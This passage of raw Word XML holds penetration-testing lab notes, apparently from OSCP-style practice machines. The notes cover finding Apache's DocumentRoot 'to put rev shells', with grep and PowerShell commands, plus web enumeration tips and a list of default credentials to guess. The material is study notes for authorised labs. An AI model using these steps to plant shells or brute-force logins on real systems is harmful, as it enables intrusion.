          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue</w:t>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fw624e89ok2z" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find the root directory of Apache (so you know where to put rev shells)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, they looked here using LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/apache2/sites-enabled/000-default.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000310">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for a line that says </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DocumentRoot'</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000314">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /etc/httpd/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000315">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /etc/apache2/sites-available/000-default.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000316">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /etc/apache2/sites-available/default-ssl.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000317">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For FreeBSD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab Machine 172.16.xxx.20</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000318">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /usr/local/etc/apache24/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000319">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is for apache 2.4 so replace it as needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /usr/local/etc/apache22/httpd.conf </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for apache 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You may also need to check extra/httpd-vhosts.conf for virtual hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /usr/local/etc/apache24/extra/httpd-vhosts.conf</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also google it. From google, it seems:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000320">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1321"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">default is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000321">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1321"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html (Ubuntu 14.04 and later, and many other distributions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000322">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1321"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www (older Ubuntu versions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000323">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1321"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/apache/htdocs (if Apache was compiled from source)</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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u3hzroo152gl" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web</w:t>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Always look at page source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory/subdomain enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I always forget </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subdomain enumeration!!!!</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25">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 useful</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL Encoder/Decoder Website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://meyerweb.com/eric/tools/dencoder/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wappalyzer </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to look at what version of services are running and then look for vulnerability!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I http://10.10.10.242</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000332">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whatweb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000333">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whatweb http://192.168.50.244</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Default things to try: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000336">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt, sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000338">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin : admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000339">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin : password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin :  123456</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin :  root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator:administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator: [no password]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root : root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root : admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000340">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root : toor (root spelled backwards)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root : [no password]</w:t>
      </w:r>
    </w:p>
